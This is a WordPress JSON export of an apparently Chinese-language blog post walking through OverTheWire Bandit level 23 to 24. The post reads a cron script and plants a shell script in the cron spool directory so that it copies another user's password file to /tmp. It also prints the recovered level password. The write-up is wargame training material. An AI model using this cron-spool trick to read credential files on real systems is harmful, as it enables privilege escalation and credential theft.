{"id":1245,"date":"2019-09-10T22:50:33","date_gmt":"2019-09-10T14:50:33","guid":{"rendered":"http:\/\/van-yzt.com\/?p=1245"},"modified":"2019-09-10T22:50:33","modified_gmt":"2019-09-10T14:50:33","slug":"bandit-level-23-%e2%86%92-level-24","status":"publish","type":"post","link":"https:\/\/huzi-baozi.com\/?p=1245","title":{"rendered":"Bandit Level 23 \u2192 Level 24"},"content":{"rendered":"

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in \/etc\/cron.d\/ for the configuration and see what command is being executed.<\/p>\n

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!<\/p>\n

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around\u2026<\/p>\n

\n\u89e3\u5bc6<\/h2>\n
bandit23@bandit:~$ ls -l \/etc\/cron.d\/\ntotal 12\n-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit22\n-rw-r--r-- 1 root root 122 Oct 16  2018 cronjob_bandit23\n-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit24\nbandit23@bandit:~$ cat \/etc\/cron.d\/cronjob_bandit24\n@reboot bandit24 \/usr\/bin\/cronjob_bandit24.sh &> \/dev\/null\n* * * * * bandit24 \/usr\/bin\/cronjob_bandit24.sh &> \/dev\/null\nbandit23@bandit:~$ cat \/usr\/bin\/cronjob_bandit24.sh\n#!\/bin\/bash\n\nmyname=$(whoami)\n\ncd \/var\/spool\/$myname\necho "Executing and deleting all scripts in \/var\/spool\/$myname:"\nfor i in * .*;\ndo\n    if [ "$i" != "." -a "$i" != ".." ];\n    then\n        echo "Handling $i"\n        timeout -s 9 60 .\/$i\n        rm -f .\/$i\n    fi\ndone\n\n<\/code><\/pre>\n
\u9605\u8bfbshell\uff0c\u53ef\u4ee5\u770b\u51fa\uff0cbandit24\u4f1a\u53bb\u6267\u884c\/var\/spool\/bandit24<\/code>\u4e0b\u6240\u6709\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u505a\u4e00\u4e2abandit24\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u628abandit24\u5bc6\u7801\u5199\u5165\/tmp\/\u4e0b\u7684\u4e00\u4e2a\u90fd\u53ef\u8bfb\u6587\u4ef6<\/strong>\u3002<\/p>\n
bandit23@bandit:~$ clear\nbandit23@bandit:~$ mktemp\n\/tmp\/tmp.Mcx9oNLd3Q\nbandit23@bandit:~$ mktemp\n\/tmp\/tmp.HsO4hET86S\nbandit23@bandit:~$ vim \/tmp\/tmp.HsO4hET86S\n...\nbandit23@bandit:~$ cat \/tmp\/tmp.HsO4hET86S\n#!\/bin\/bash\n\ncat \/etc\/bandit_pass\/bandit24 > \/tmp\/tmp.Mcx9oNLd3Q\nbandit23@bandit:~$ chmod +rx \/tmp\/tmp.HsO4hET86S\nbandit23@bandit:~$ ls -l \/tmp\/tmp.HsO4hET86S\n-rwxr-xr-x 1 bandit23 root 65 Sep 10 16:43 \/tmp\/tmp.HsO4hET86S\nbandit23@bandit:~$ chmod 666 \/tmp\/tmp.Mcx9oNLd3Q\nbandit23@bandit:~$ ls -l \/tmp\/tmp.Mcx9oNLd3Q\n-rw-rw-rw- 1 bandit23 root 0 Sep 10 16:42 \/tmp\/tmp.Mcx9oNLd3Q\nbandit23@bandit:~$ cp \/tmp\/tmp.HsO4hET86S \/var\/spool\/bandit24\/\n\n... wait\n\nbandit23@bandit:~$ cat \/tmp\/tmp.Mcx9oNLd3Q\nUoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ\n<\/code><\/pre>\n
\n\u77e5\u8bc6\u70b9<\/h2>\n
    \n
  1. \n\u9605\u8bfbbandit24\u7684\u811a\u672c\uff0c\u7406\u89e3\u5728\u505a\u4ec0\u4e48\u4e8b\u60c5\uff1b<\/li>\n
  2. \n\u6ce8\u610f\u6743\u9650\u7684\u63a7\u5236\uff0c\u8ba9\u6211\u4eec\u5199\u7684\u811a\u672c\u6587\u4ef6\u53ef\u4ee5\u5141\u8bb8\u7b2c\u4e09\u65b9\u6267\u884c\uff1arx\uff0c\u8ba9\u76ee\u6807\u6587\u4ef6\u53ef\u4ee5\u88ab\u7b2c\u4e09\u65b9\u5199\u5165\uff1arw\uff1b<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"
    A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in \/etc\/cron.d\/ for the configuration and see what command is being executed. NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this … <\/p>\n
    Continue reading “Bandit Level 23 \u2192 Level 24”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1245","post","type-post","status-publish","format-standard","hentry","category-bandit"],"_links":{"self":[{"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/posts\/1245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1245"}],"version-history":[{"count":1,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/posts\/1245\/revisions"}],"predecessor-version":[{"id":1246,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=\/wp\/v2\/posts\/1245\/revisions\/1246"}],"wp:attachment":[{"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/huzi-baozi.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}